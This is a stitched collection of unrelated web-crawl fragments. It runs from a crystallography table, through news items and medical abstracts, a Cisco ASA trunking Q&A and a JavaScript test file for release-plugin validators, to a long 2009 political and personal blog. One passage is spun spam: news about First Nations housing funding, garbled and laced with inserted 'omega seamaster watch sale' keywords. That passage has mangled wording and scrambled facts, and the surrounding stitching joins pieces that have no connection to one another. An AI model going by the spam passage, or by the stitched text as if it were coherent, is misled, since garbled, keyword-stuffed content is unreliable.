O1---C7---C8 120.4 (2) C14---C15---C10 119.32 (19)
C6---C7---C8 117.61 (18) O4---C16---H16A 109.5
O2---C8---C7 111.19 (18) O4---C16---H16B 109.5
O2---C8---H8A 109.4 H16A---C16---H16B 109.5
C7---C8---H8A 109.4 O4---C16---H16C 109.5
O2---C8---H8B 109.4 H16A---C16---H16C 109.5
C7---C8---H8B 109.4 H16B---C16---H16C 109.5
C6---C1---C2---C3 0.1 (3) C8---O2---C9---C10 171.08 (17)
C1---C2---C3---C4 0.1 (3) O3---C9---C10---C11 170.4 (2)
C1---C2---C3---Br1 178.86 (15) O2---C9---C10---C11 −10.3 (3)
C2---C3---C4---C5 0.1 (3) O3---C9---C10---C15 −10.5 (3)
Br1---C3---C4---C5 −178.69 (15) O2---C9---C10---C15 168.90 (17)
C3---C4---C5---C6 −0.4 (3) C15---C10---C11---C12 −0.2 (3)
C4---C5---C6---C1 0.5 (3) C9---C10---C11---C12 179.0 (2)
C4---C5---C6---C7 179.23 (18) C10---C11---C12---C13 −0.2 (3)
C2---C1---C6---C5 −0.4 (3) C11---C12---C13---C14 0.5 (4)
C2---C1---C6---C7 −179.03 (19) C12---C13---C14---C15 −0.6 (4)
C5---C6---C7---O1 4.6 (3) C16---O4---C15---C14 0.5 (3)
C1---C6---C7---O1 −176.7 (2) C16---O4---C15---C10 −178.7 (2)
C5---C6---C7---C8 −175.25 (18) C13---C14---C15---O4 −179.0 (2)
C1---C6---C7---C8 3.4 (3) C13---C14---C15---C10 0.2 (3)
C9---O2---C8---C7 −76.7 (2) C11---C10---C15---O4 179.39 (17)
O1---C7---C8---O2 4.4 (3) C9---C10---C15---O4 0.2 (3)
C6---C7---C8---O2 −175.70 (16) C11---C10---C15---C14 0.1 (3)
C8---O2---C9---O3 −9.5 (3) C9---C10---C15---C14 −179.03 (18)
-------------------- -------------- ----------------------- --------------
Hydrogen-bond geometry (Å, °) {#tablewraphbondslong}
=============================
------------------ --------- --------- ----------- ---------------
*D*---H···*A* *D*---H H···*A* *D*···*A* *D*---H···*A*
C2---H2A···O1^i^ 0.93 2.45 3.360 (3) 165
------------------ --------- --------- ----------- ---------------
Symmetry codes: (i) *x*+1, *y*, *z*.
###### Hydrogen-bond geometry (Å, °)
*D*---H⋯*A* *D*---H H⋯*A* *D*⋯*A* *D*---H⋯*A*
------------------ --------- ------- ----------- -------------
C2---H2*A*⋯O1^i^ 0.93 2.45 3.360 (3) 165
Symmetry code: (i) .
[^1]: Thomson Reuters ResearcherID: A-3561-2009.
[^2]: Thomson Reuters ResearcherID: A-5525-2009.
| 2024-07-08T01:27:15.642919 | https://example.com/article/4415 |
Header Menu
Watch Live: President Trump Addresses The Nation On Florida School Shooting
Following the 8th largest mass shooting in American history, and 18th school shooting in 2018 (and one-per-week since 2013), President Trump is set to address a mourning nation faced with an epidemic that is perhaps more of a problem than opioids.
President Trump tweeted his condolences this morning and called for flags to fly at half-mast...
My prayers and condolences to the families of the victims of the terrible Florida shooting. No child, teacher or anyone else should ever feel unsafe in an American school.
So many signs that the Florida shooter was mentally disturbed, even expelled from school for bad and erratic behavior. Neighbors and classmates knew he was a big problem. Must always report such instances to authorities, again and again! | 2024-05-17T01:27:15.642919 | https://example.com/article/5580 |
[Pulmonary surfactant system in dust-induced bronchitis].
The study of surfactant effects and their biochemical composition in the expiration condensate covered 102 patients with dust bronchitis (DB). Decrease of surfactant effects and violation of the proportion of surfactant lipid fractions (increase in the percentage of free fat acids, triacylglyceride decrease) were noted along with the growth of DB severity and clearly defined pulmonary emphysema. | 2024-06-28T01:27:15.642919 | https://example.com/article/3592 |
Relationship of gliomas to the ventricular walls.
The role of neural stem cells in gliomagenesis remains controversial. The aim of this study was to determine the anatomic relationship of human gliomas to the lining of the ventricular walls, known as the subventricular zone, an area replete with neural stem cells. We performed a retrospective radiographic analysis of 100 consecutive patients with gliomas and sought to determine the relationship of the lesions to the ventricular walls as seen on their MRI scans. Our results indicated that in 93% of cases the lesions contacted at least one region of the lateral ventricular wall. Contact with the ventricular wall was independent of the glioma size or mass effect. These findings were correlated to cytoarchitectural studies of the human subventricular zone. Our findings lend further support that there is an intimate association between gliomas and the subventricular zone. | 2024-03-09T01:27:15.642919 | https://example.com/article/2463 |
Jim Renacci Leaves Governor Race To Launch US Senate Bid Instead
And as many of you also know, several months ago, after witnessing years of dysfunction in Washington, I announced my intention to leave the House of Representatives to run for Governor Ohio.
Rep. Jim Renacci (R-OH) will drop out of Ohio's gubernatorial race to run for the Republican nomination in the state's Senate race, the Cincinnati Enquirer reported on Wednesday.
An avid supporter of President Trump, Renacci said a White House meeting on Wednesday was the turning point in his decision.
OH state treasurer Josh Mandel, who was Republicans' top candidate to oppose Brown, unexpectedly dropped out of the race last week, citing his wife's health.
On Thursday, Congressman Jim Renacci switched gears from being a candidate for governor and announced that he wants the Senate job. "And for that reason I've agreed to answer the call to service and enter the race for United States Senate", Mr. Renacci said. Sherrod Brown (D-OH) because of a health issue with his wife.
Having grown up on the cusp of poverty in western Pennsylvania, and later dedicated myself to raising a family and growing businesses across OH, entering the political arena was never part of the path that I envisioned for my life.
Whoever emerges from the May 8 Republican primary would have their hands full trying to unseat Brown, who has been in the Senate since 2007.
Brown, an Ohio Democrat seeking his third term in the U.S. Senate, now faces Republican Mike Gibbons.
Ohio Democratic Party spokesman Jake Strassberger called Renacci "the poster boy of Washington Republicans who've spent their time in office betraying middle-class workers to make life easier on the wealthy and well-connected". "The fact remains that Mike Gibbons is far better positioned to defeat Sherrod Brown than any member of Congress". Vance, who recently moved back to OH from California, has been courted by Senate Majority Leader Mitch McConnell.
J.D. Vance, the Middletown, Ohio, native who wrote the best-selling "Hillbilly Elegy" that was often cited in 2016 for insights into Trump's white working-class support, has also been discussed as a potential Republican entrant.
The former football coach's only donation outside of OH, besides his support for Kasich, was $1,000 to the Republican National Committee in 2008, when Sen.
Renacci, who has represented OH in Congress since 2011, would have the president's support in a state Trump won in 2016 by 8 percentage points. | 2023-12-29T01:27:15.642919 | https://example.com/article/8402 |
Q:
Trunk on the outside ASA interface
I have a topology as in the picture. It is designed to be a factory network. 2 ASAs in a failover cluster border the whole LAN. And it is pretty much clear how to configure them: outside interface to ISP, inside subinterfaces to different VLANs.
But, I need ti have also HA clusters to border Workshops from the rest of the LAN. And I cannot understand, how exactly to configure ASAs.
I thought to put them in a transparent mode. But in any case, the interface (Outside) from ASA to switch DSW3-RING need to be trunk, isn't it?
I got really confused thinking about it.
Thanks in advance for help]2
A:
Assuming you don't route between VLANs, you can create multiple subinterfaces (one for each VLAN) and connect them to the ring as a trunk. The physical interface won't have a name, only the subinterfaces will.
| 2023-11-25T01:27:15.642919 | https://example.com/article/6727 |
Hereditary pancreatitis.
Hereditary pancreatitis is an idiopathic form of chronic pancreatitis which affects multiple members of a family in an autosomal dominant mode of inheritance. Most of the case reports are in caucasians of European descent. In this report, we present our data on four affected members spanning three generations in a family from India. Current data on hereditary pancreatitis are summarized, to revive an interest in this rare form of chronic pancreatitis. | 2024-05-04T01:27:15.642919 | https://example.com/article/6052 |
const test = require('ava');
const plugins = require('../../lib/definitions/plugins');
const {RELEASE_NOTES_SEPARATOR, SECRET_REPLACEMENT} = require('../../lib/definitions/constants');
test('The "analyzeCommits" plugin output must be either undefined or a valid semver release type', (t) => {
t.false(plugins.analyzeCommits.outputValidator('invalid'));
t.false(plugins.analyzeCommits.outputValidator(1));
t.false(plugins.analyzeCommits.outputValidator({}));
t.true(plugins.analyzeCommits.outputValidator());
t.true(plugins.analyzeCommits.outputValidator(null));
t.true(plugins.analyzeCommits.outputValidator('major'));
});
test('The "generateNotes" plugin output, if defined, must be a string', (t) => {
t.false(plugins.generateNotes.outputValidator(1));
t.false(plugins.generateNotes.outputValidator({}));
t.true(plugins.generateNotes.outputValidator());
t.true(plugins.generateNotes.outputValidator(null));
t.true(plugins.generateNotes.outputValidator(''));
t.true(plugins.generateNotes.outputValidator('string'));
});
test('The "publish" plugin output, if defined, must be an object or "false"', (t) => {
t.false(plugins.publish.outputValidator(1));
t.false(plugins.publish.outputValidator('string'));
t.true(plugins.publish.outputValidator({}));
t.true(plugins.publish.outputValidator());
t.true(plugins.publish.outputValidator(null));
t.true(plugins.publish.outputValidator(''));
t.true(plugins.publish.outputValidator(false));
});
test('The "addChannel" plugin output, if defined, must be an object', (t) => {
t.false(plugins.addChannel.outputValidator(1));
t.false(plugins.addChannel.outputValidator('string'));
t.true(plugins.addChannel.outputValidator({}));
t.true(plugins.addChannel.outputValidator());
t.true(plugins.addChannel.outputValidator(null));
t.true(plugins.addChannel.outputValidator(''));
});
test('The "generateNotes" plugins output are concatenated with separator and sensitive data is hidden', (t) => {
const env = {MY_TOKEN: 'secret token'};
t.is(plugins.generateNotes.postprocess(['note 1', 'note 2'], {env}), `note 1${RELEASE_NOTES_SEPARATOR}note 2`);
t.is(plugins.generateNotes.postprocess(['', 'note'], {env}), 'note');
t.is(plugins.generateNotes.postprocess([undefined, 'note'], {env}), 'note');
t.is(plugins.generateNotes.postprocess(['note 1', '', 'note 2'], {env}), `note 1${RELEASE_NOTES_SEPARATOR}note 2`);
t.is(
plugins.generateNotes.postprocess(['note 1', undefined, 'note 2'], {env}),
`note 1${RELEASE_NOTES_SEPARATOR}note 2`
);
t.is(
plugins.generateNotes.postprocess(
[`Note 1: Exposing token ${env.MY_TOKEN}`, `Note 2: Exposing token ${SECRET_REPLACEMENT}`],
{env}
),
`Note 1: Exposing token ${SECRET_REPLACEMENT}${RELEASE_NOTES_SEPARATOR}Note 2: Exposing token ${SECRET_REPLACEMENT}`
);
});
test('The "analyzeCommits" plugins output are reduced to the highest release type', (t) => {
t.is(plugins.analyzeCommits.postprocess(['major', 'minor']), 'major');
t.is(plugins.analyzeCommits.postprocess(['', 'minor']), 'minor');
t.is(plugins.analyzeCommits.postprocess([undefined, 'patch']), 'patch');
t.is(plugins.analyzeCommits.postprocess([null, 'patch']), 'patch');
t.is(plugins.analyzeCommits.postprocess(['wrong_type', 'minor']), 'minor');
t.is(plugins.analyzeCommits.postprocess([]), undefined);
t.is(plugins.analyzeCommits.postprocess(['wrong_type']), undefined);
});
| 2023-10-30T01:27:15.642919 | https://example.com/article/7318 |
omega seamaster watch sale
omega seamaster automatic price
...
2M so you First us homes
More than a few omega watch company northwestern Ontario First america's purchased loan for brand new dwellings and so restorations as to classic ones february.
16.
Very big eagle plaza, Kasabonika, Naotkamegwanning(Whitefish current), Northwest put 37, omega seamaster watch sale Wauzhushk Onigum and then Eabametoong might find the main $14.2 million in support Kenora mp Greg Rickford released this First country upper house omega watch constellation expo in mastery fresh.
Actress' leading Harry Papah of a Eabametoong First world are grateful for that $940,000 supplied to his / her industry. The compensation will be employed to build other main a place to live instruments in Eabametoong regarding smaller accommodations families.
"Substantial amount of such new-Found real estate apartments will do a lot to ease the backlog in relatives desiring shield, Papah being discussed.
A sum $14.
2 million produced with Canada's monetary climate method will be distributed around First land communities in Ontario to treat urgent property considerations. Typically Canadian cover plus home finance business should assign $8 million so that you modernize models retrofit 577 $6.2million the topic of will be familiar with omega leather watch subsidize 29new cover types when it is about ppark in tario. | 2024-03-31T01:27:15.642919 | https://example.com/article/3801 |
Tuesday, March 31, 2009
Last November I wrote a piece about the aforementioned NFL star and his mishap with a gun going off in a Manhattan night club - turns out that the gun was not registered in NY State, but Florida where he had lived previously.
Months later, a media frenzy surrounds him as he prepares for his day in court, though there is speculation that his attorney will ask for a "continuance" - not sure of the verbiage - either way - he is looking at up to 15 years in prison for this felony charge.
In my previous post about this story, I think I was a tad too harsh on Plaxico and wish to publicly admit that this writer was a bit one-sided in her zeal to judge him given her distaste for all things firearm related.
The bottom line is that Mr. Burris is actually an upstanding citizen - he has no criminal record whatsoever and the fact that he did not register his gun in another state because he had recently relocated does not make him Charles Manson. His mistake in judgement occurred when he brought a gun - loaded - into a private club without a clip for safety purposes.
I hope that he gets a fair shake - I am doubtful - we are after all speaking of an African American male and we know how our justice system likes to treat them don't we?
It seems that the Black caucus has "called the President out" for not having enough women and minorities involved in the banking bailouts.
It is not enough that he has a council on women - the first President to do so that I can recall - it is not enough that the Attorney General is black - it is not enough that his wife is black - she could just have easily been white, given his bi-racial heritage - we all know that would not have played in the White House and McCain and Palin would be ruling the roost in that scenario - perish the thought.
I must admit that I had some serious Schadenfreude when I heard that Waggoner was stepping down from GM last week.
Today I have angst and outrage over this story detailing his retirement package. It posted an hour ago on my mobile device via CNN - I cannot link to the story so I am pasting it in its entirety here:
"General Motors' outgoing chief executive Rick Wagoner is eligible to receive more than $20 million in his retirement package, according to a filing with the Securities and Exchange Commission.Wagoner announced Monday he was resigning at the request of the Obama administration, which has prodded GM to restructure as the company receives government financing to stay afloat.
Although Wagoner is not eligible for any severance pay upon leaving GM, he is eligible for hefty retirement benefits."He has worked for GM for nearly 32 years, and he would be entitled to certain vested awards, deferred compensation, and pension and other post-retirement benefits," GM said in a statement.Upon Wagoner's departure he will be eligible for both a salaried retirement plan and an executive retirement plan, which at the end of last year totaled approximately $20.2 million, GM spokeswoman Julie Gibson said.Most of it would be paid out as an annuity over five years, with the remainder as a small lifetime annuity, Gibson said.
Wagoner hasn't yet officially left the company and has not received any of the retirement compensation. What will actually be paid to him is still being reviewed, GM said.Paul Hodgson, senior research associate at The Corporate Library, which analyzes corporate governance and pay, said if Wagoner is contractually entitled to the compensation, GM couldn't insist on withholding it.Wagoner will not comment on the matter, Gibson said. The United Auto Workers also said it had no comment on Wagoner's compensation.
Wagoner said late last year he would accept a $1 annual salary if the federal government would come through with billions of dollars in loans for GM. The loans came, and Wagoner's $1 salary commenced January 1, according to a filing with the SEC.The federal government has loaned $13.4 billion to GM and $4 billion to fellow struggling automaker Chrysler, and on Monday, President Obama gave failing grades to both companies for their turnaround efforts. He said the government would give GM "adequate working capital" over the next 60 days, during which GM must prove it can "restructure in a way that would justify an investment of additional taxpayer dollars."Chrysler will be given adequate capital to continue operations for 30 days while completing a merger with Fiat.Wagoner became CEO of GM in 2000. Before that, he was chief operating officer and led the company's North American operations. He also served as chief financial officer from 1992 to 1994."
No wonder the auto industry is in such a bloody mess! Twenty million dollars in a retirement package? On what planet is that even acceptable? Of course these CEO's can afford to accept a paltry $1 salary - they think that we the public have forgotten all about their bonuses, stock options and retirement packages that they continue to draw from during times of financial duress for their companies - I am outraged and we all should be! Maybe it is true - maybe GM was beginning to turn around under Waggoner, but after reading the story, methinks they/we are all better off without him. Mr. Waggoner will have earned about 3/4 of a million dollars for each of his 32 years of service - talk about overpaid!
All things being equal, even the President who can do a marginal job - think GW Bush - can hardly earn that amount with speaking engagements post White House - why on earth is it acceptable for a CEO to receive not a golden parachute, but a platinum and diamond encrusted parachute in this case? How much is too much and when is it ever going to be enough?
This story posted just about an hour ago on my mobile device - what was I saying earlier about being a news junkie??
I digress - it is an amazing account of the remarkable Michelle Obama, with comparisons to Jackie Kennedy and what she did for the American image abroad.
Here is the story - I have to post it in its entirety, since there is no link on the CNN main page.
"What can the first lady accomplish when she accompanies her husband on his first trip to Europe? She can play a role in the rebranding of America.President Obama has star power. We saw it when he traveled to Europe during the campaign. So does the first lady: When Michelle Obama accompanies her husband overseas this week for the G-20 summit, it's likely to double the wattage."I believe in this nation. And I believe in my husband,'' the first lady said in a recent interview on ABC's "Good Morning America.''Obama remains a figure of hope to the world. But he is not immune from criticism. His policies have been under attack abroad as well as at home.
"He talks about a large stimulus campaign by Americans. All of these steps, their combination and their permanency, is a way to hell," Czech Prime Minister Mirek Topolanek said.Some foreign leaders are resentful because the financial crisis that threatens to undermine the world economy started in the United States."It was a crisis that was created and spread throughout the world due to the irresponsible behavior of white people, blue-eyed people, that thought they knew everything but are now showing they knew nothing," Brazilian President Luiz Inacio Lula da Silva said.
Obama's mission is to rebrand the United States as a force for change and hope in the world, just as John F. Kennedy once did.First lady Jacqueline Kennedy was an important asset to JFK. Her charm and sophistication were a sensation overseas. Michelle Obama also embodies a new American brand: diversity and accomplishment."We're at a time when we're going to have to try a lot of things. Some of it won't work; some of them will," the first lady said.
Although her schedule overseas has not been made public, CNN has learned that the first lady will venture out twice on her own.In London, England, Michelle Obama will visit a school for underprivileged girls, many of them learning to speak English. She is likely to make a strong statement about women's rights, as she did recently when she brought together "Women of Courage'' at the White House."The difference between a struggling family and a healthy one is often the presence of a strong woman or women at the center of that family," she said.The first lady will also visit the Jewish quarter of Prague, in the Czech Republic, which symbolizes the tragic history of a community that found success and influence in the United States.An African-American first lady will pay tribute to women and Jews. It's the new face of America."
God bless America and I thank God every day since the election that the change which we had longed for has finally come!
Angie Harmon is an amazing actress and is among a number of Republicans who are disenchanted with our current President. After barely surviving the last 8 years, I know what it feels like to have a voice in the White House espousing policies that are so far from your own ideaology, one wanted to go to bed and wake up when it was all over. Thank God, the American public has spoken and it is all over - we are in a new era of hope and change sweeping the land, indeed the entire globe.
President Obama is faced with some of the most tumultuous times in recent history - two wars, an economic crisis the likes of which we have not seen since the Great Depression, the auto industry in crisis and rising unemployment. He is recently being criticized for taking on too much at once. What on earth is the man supposed to do? Retire to his bed at 9.00 each night and hope and pray that things just get better?
We are in an unprecedented time - good and bad - there is much greatness in the world - we are more unified with our allies than in recent years - we are more aware of being part of a global environment - we are finally addressing global warming, community gardens, taking care of our neighbors on our streets and across the world. There is also much sorrow. Wars, famine, turbulence, political unrest in many parts of the world.
This week, President Obama is meeting with the G-20 in an amazing show of force, not the usual meeting just for the original G-8, but also for the up and coming, developing forces in the world - this is an incredibly brave endeavor - Vice President Biden started out last week to warm the stage for Obama - the two men are an incredible force - formidable, even.
This financial debacle began on our shores - the greed of Americans, specifically COO's, CEO's and other top executives, along with their cohorts on Wall Street - saw a way in which they could earn obscene amounts of monies with toxic mortgages and now we have the fallout - huge foreclosure rates and millions of out of work Americans, not to mention the debacle with our own 401 K accounts.
Yes - Angie Harmon can express her outrage at what she believes to be Obama's inexperience, but in my estimation, he is doing an amazing job with remarkable grace and leadership. It is her right to criticize, but let us not call her racist because our new President just happens to be black.
Monday, March 30, 2009
For over 20 years while I was a practicing Mormon, I bemoaned the fact that there was no time for socializing on Sundays. Mormons are worker bees - they pride themselves on their work ethic - there are more call centers located in Utah's "Beehive State" than anywhere else in the nation - why? It is a right to work state, Mormons are hardworking and are grateful to have a job - any job - by and large, they marry young and have kids while trying to finish undergraduate school, so that $8 an hour call center job is a necessity to supplement financial aid from school.
I know all about it - I was one of those working Mormon women - worked while my husband went to school - worked really hard as a preschool teacher for a pittance in Kentucky. All because of my belief in the Mormon ethic of hard work etc. Years later, it is my turn to return to college and complete the degree that I began many years ago. I digress.
Fast forward a few years and I have become a lover of coffee since having left my Mormon faith behind during my years of living in Zion - aka - Utah. I love coffee hour - it is a sacred tradition that I hold dear. Each Sunday after worship, I go to the social hall and mingle with parishioners as we discuss the sermon, politics, work, networking possibilities, kids, neighborhood goings on and much, much more.
Yesterday, I was privileged to attend worship with a dear friend who attends a church where the minister was celebrating his one year installation anniversary. There was more than a coffee hour - there was a sumptuous banquet - salmon, baked and fried chicken, salads and rolls and delicious desserts.
I sat at a table with my friend, a separated man (experiencing his second divorce), and a deacon who is celebrating over 30 years of marriage with the same woman. We talked candidly about the sexes and what each of us wants. It was an eye-opening conversation. I heard that women want men to take out the trash and buy them diamonds - I don't want diamonds and I can take out my own trash, thank you very much! Diamonds are blood money and I want no part of it - I will take a QVC Diamonique ring any day - I want a man who meets me half way - a man who has a life and will be a helpmeet to me - one who loves me and cherishes me as much as I love and cherish him. One who accepts me with my weaknesses and my intellect - who is not afraid of my strong opinions and loves mental sparring. I want a man who is passionate and caring, strong and silent, who knows about the world and who his elected officials are - who is committed to making a difference in his community and who is committed to me. I heard that women want men with tons of money - I can earn my own money and buy my own coffee/dinner. I am happy to split the cheque on most occasions, but at the present time, find myself working part time due to the economy. This is but for a season.
What I do know is that I know exactly what I am seeking in a man - I get men on a very fundamental level - which comes not only from having raised 3 sons, but also from the amazing men I am privileged to know intimately - and not in the biblical sense - the two Jim's, Dan and John, Les, Clark, Gordon, Alex, Blaine, Scott and my favorite guy on the planet - for the most part, these men are gay, but that is not what makes them amazing - what makes them amazing is that they know that for years, I was married to a gay man and am therefore not a threat to them, as I am their ally. They are as real as they dare to be with me. I meet them exactly where they are - no expectations, no assumptions.
It speaks of the different countries in Europe and how they are managing their respective workforces during times of an economic downturn. Contrary to their American confreres, they are not laying off, they are putting workers on shorter work weeks or furloughs, as in the case of my brother in law who works for Ford Motor Company. Of course, he would rather work his regular hours and have a full paycheck, but in this case, 1/2 a paycheck is better than no paycheck at all.
Last week, I was visiting with a coworker - we chatted briefly about our respective families and then he said something that was quite remarkable - he was glad that his family was all employed. It was said so simply and with a sense of reverence, even deep gratitude.
I mused over his reaction and comment for the rest of the week and shared the story with another coworker today. Ironically, we have had a few layoffs where I work in recent weeks and the mood has been quite sombre, morose, even and certainly not without great duress, given the nature of having to lay people off.
In the case of the small non profit where I work, having those individuals remain even on a part time basis was simply not feasible. The monies are running out and in a few short years, the organization will likely cease to exist, short of some extraordinary fundraising efforts. Granted, every effort is being made to see that the closure does not come, hence the laying off of two staffers.
That stated, what if we in America would look to our European counterparts for guidance - shorter work weeks, job sharing, longer vacation times, etc.
If you read the article whereof I speak, you will be perhaps surprised as I to find that of those who have been laid off in this countryin the last 12 months, 6 in 10 workers have not received any unemployment benefits.
It is time to rethink how we work in this country - Utah is leading the charge - the governor implemented a 4 day work week some months ago, to save on gas prices. Other states should follow suit.
I have to know what is going on at all times - my mobile phone has alerts and browsing capabilities, I check emails to get Washington Post and NYTimes updates constantly - I check CNN all the time and read as many online publications and print news journals and watch news journal shows when I possibly can. I am addicted to news and have to know what is going on all over the world whenever I can.
Today I got a dose of reality when I happened upon the good news network www.gnn.com
Please check it out at least once a day, or in my case - at least as often as you check out the OTHER news - there is so much bad stuff out there, one could become abysmally depressed.
The story ran on the AP on March 26th - here it is - it is brief, so I am posting it in its entirety:
"Mayor Michael Bloomberg is reaffirming his support for legalizing gay marriage.The mayor told an audience Wednesday night that he will again ask state lawmakers to allow gay couples to tie the knot in New York. But he doesn't know whether Albany is ready to support such a measure.
Mr. Bloomberg made the remarks at an annual dinner of the Lesbian, Gay, Bisexual & Transgender Community Center.
He says the tide of public opinion is turning in support of gay marriage. Mr. Bloomberg offered to testify in favor of any bill considered in the capital.
The statement came less than a week after New York Sen. Charles Schumer appeared to reverse course in his views on gay marriage, saying no group should be deprived of equality."
This story is heartening for those of us who have been in the trenches, fighting alongside our gay brothers and sisters for equal rights - if Charles Shumer can have a change of heart, what is next? Are we really ready to have this debate in Albany?
New York runs red and blue and the further upstate one goes, the bluer it gets - It was to be a goal of Governor Patterson to address the inequities in GLBT relationships vis-a-vis gay marriage, but after realizing what a hot button issue it was, it was decided by the powers that be to table the issue until they were more sure that he would be elected outright. That is still to be determined. What we do know is that gay rights are civil rights and equal rights should go to everyone.
I was a member of the amazing group Equality Utah for several years during my sojourn in the Rockies - every year, I would watch aghast as hateful legislation was brought forth against my gay friends - denying the right for domestic partner benefits, health insurance and other such issues were routinely targeted.
I have written of being a former political appointee of the mayor of Salt Lake City - often I am asked of my proudest moments during my tenure - by far, the Winter 2002 Olympic Games were my proudest moment and the next proudest moment was when the mayor signed an executive order relative to domestic partnerships, indicating that all city employees should be entitled to them as GLBT persons. I was truly proud of the mayor on that day as I stood behind him in his ornate conference room - surrounded by leaders, friends and allies of the gay rights movement in Utah - yes - there is one of them in Utah - it is not as advanced as what we have in New York or California, but it is there nonetheless.
I continue to speak for my brothers and sisters of the GLBT community - that they will be heard, that they will get the rights that we in the straight community take for granted - may that day come soon and may we never take it for granted that there but for the grace of God go all of us - women, people of color and other minorities - we are in this struggle together.
Equal is right - and remember - injustice to one is an injustice to all of us.
Thursday, March 26, 2009
As it happens, after all the moaning, groaning, whining and grandstanding of recent weeks, the powers that be (Congress) have now decided that we need those at the helms of large financial entities on our side, in order to release funds to Joe citizen to get the economy moving again. It is truly a matter of which came first - the chicken or the egg, or we all need each other to get along - take your pick.
I would have liked to see some appropriate penalties levied against AIG staffers for their grossly inflated and inappropriately timed bonuses, but apparently I am not going to see that in my lifetime. What we have all learned is a great deal - we are surely more aware of golden parachutes, stock options, corporate jets and most of all - bailout monies, who gets them and what is done with them.
In a recent conversation with an employee at UBS, he shared that he too had received a bonus that he did not want to see taxed - granted, his monies came from Switzerland, but I can't imagine that country has money to throw away any more than ours does at this time - speaking for taxpayers. It has become a debacle, a boondoggle, a tar baby that no-one knows quite how to handle - almost like the out-of-control preschooler having a tantrum in the grocery store - the parents are afraid to say anything for fear of sounding harsh - onlookers fear the wrath of the parents, and so, nothing is said at all.
This posted on AOL earlier today: Could It Really Be Him? Yeah, ProbablyBy RACHEL L. SWARNS"The Obamas’ out-and-about style has Washington, D.C., residents asking each other: Have you bumped into your president and first lady yet?"
Can you imagine such a thing? You are out at a basketball game and see the President sipping a beer during half time - you are out dining and find the First Couple entering your favorite restaurant - you are at the ballet or theater and find the First Family enjoying an evening of ballet or the Alvin Ailey dancers. For years, the First Family has lived behind a shroud - even the gregarious Clintons were not as outgoing as the Obamas - that is what makes this story so likeable.
We are in the midst of a world economic crisis, fighting two wars, unemployment is at a 26 year high and still the First Family finds time to get out into their neighborhood.
I read the story and was reminded again of why I relate with this couple so well. Whenever I move, that's one of the first things I do - find a favorite coffee place, restaurant, theater - get out and meet my neighbors - that is exactly what they are doing - we should all be proud that they are setting an example for the rest of us - we are surely in a quagmire, but we will not always be - when the good times roll again - we will be thankful for our local coffee shops, restaurants, friends to hang out with (whom we have hopefully not forsaken during these times of hardship anyway). The Obamas have what we all should be striving for - life balance.
Wednesday, March 25, 2009
This is an amazing story about being our brother's keeper. I just found this story on CNN and was amazed. This individual makes about $700 a week and is from Colombia originally. For a living, he drives a school bus. In 2004, a friend told him about the amount of food that was being thrown away regularly where he worked and he decided to do something about it.
He began by simply delivering lunches to men in need and over time, it transformed into something much larger. Here is an excerpt from the story: "Munoz began his unorthodox meal program -- now his nonprofit, An Angel in Queens -- in the summer of 2004. Friends told him about large amounts of food being thrown away at their jobs. At first, he collected leftovers from local businesses and handed out brown bag lunches to underprivileged men three nights a week. Within a few months, Munoz and his mother were preparing 20 home-cooked meals daily."
Please read the story in its entirety - it will warm your heart and might even inspire you to do something as we try to make it through this most difficult time in which we find ourselves.
I recently took a trip upstate to Ossining. I went to the infamous prison Sing Sing for a tour. The tour leader was an intelligent and engaging young man by the name of Sean Pica. He is a remarkable man - a former inmate who is now the executive director of the amazing Hudson Link - a partnership with Mercy College and Sing Sing inmates to use education as a link in the chain that keeps inmates from sliding towards recidivism upon release from state's custody - those figures (for recidivists) are somewhere near 60% as I recall.
I thought I had a vague idea of what to expect at the facility. I was wrong. It was a much colder and harsher environment than even I had envisioned. We were a group of about 15 on the tour on that cold Monday evening. The cold made even more bitter with the frigid wind whistling off the Hudson river. I was truly not prepared for the way I would feel once those heavy gates slammed shut behind our group.
We were, of course, with a guard at all times - counted every time we went through another locked area or cell block. We kept ourselves together as instructed, always keeping to the right like the prisoners are trained to do. One group of inmates in cell block A was watching the news and did not seem to mind the intrusion on their private life. One inmate even showed us the inside of his small cell - he had tried to make it seem like "home" - a man can spend a lot of years in Sing Sing - some are lifers - we didn't meet any of those.
The highlight of the evening was a presentation about the previously noted Hudson Link program. It is a truly amazing collaboration between Mercy College and certain inmates at Sing Sing - whereby inmates (carefully selected based on behavior and academics) are given the opportunity to receive a Bachelor's degree in Organizational Management. Amazingly, not a single former inmate has returned to prison after going through this program - not a single one! Those are statistics that should not be taken lightly, given that again - some 60% or more of inmates will become repeat offendors and return to prison at some time after being released from Department of Corrections rolls.
You can call Sean directly if you would like to have him schedule a tour for a group, or even come and speak to a group with which you are affiliated - you can reach him at 914.941.0794, or if you would like to donate a specific amount of monies - $3000 is the cost of one complete course - $300 is the cost of textbooks for a semester - $100 is the cost of the commencement fee, cap and gown per student and supplies and dictionaries for new students is $50.
You can view more information about this amazing program via their website. www.hudsonlink.org
Sunday, March 22, 2009
I was, as many New Yorkers, shocked, humiliated and embarassed by the prostitution debacle that brought down our amazing Governor, Eliot Spitzer last year.
In the meantime, he has bowed out of public life and spent time away with his wife and three daughters. He has earned their forgiveness for his acts and seems to be contrite and much wiser for having had the unimaginable experiences that thrust him into the butt of late night jokes, water cooler gossip and the like for many weeks last year.
I was most impressed with him today as I watched him interviewed by the competent Fareed Zakharia on CNN's GPS show this afternoon. He was the Eliot Spitzer I admired from years ago as Attorney General of New York - intellectually stimulating, articulate, knowledgeable and amazingly direct and candid in his responses.
He had some remarkable insight into the AIG mess, based on his prosecuting the company some years ago whilst still serving as AG. That he had such insight reminded me of why it is that I miss him, particularly these days when his successor seems to be stumbling along in finding his way as Governor of New York.
Some might question Eliot's qualification or even his ability to speak of the bad behavior of the folks at AIG, but his countenance and answers today led me to believe that he is a different man than he was over a year ago - he no longer appears to be quite as cocky, if that is the right word - he appears somewhat humbled and definitely has learned from his own missteps. He has every right as a private citizen, and certainly as a sometime columnist for Slate Magazine to speak out on issues that concern him - in fact, it would appear that his years of experience have qualified him most eminently for same.
I wish him the very best in his endeavors and hope that the American public will be kind to him as he carefully treads his way back into the public eye. After all, there but for the grace of God, go we all.......
Saturday, March 21, 2009
I love NCAA basketball. I live and breathe the game during March each year.
I was a one time assistant coach on one of my sons' basketball teams when we lived in Utah - Junior Jazz, they called the teams back them. Still do, as far as I know.
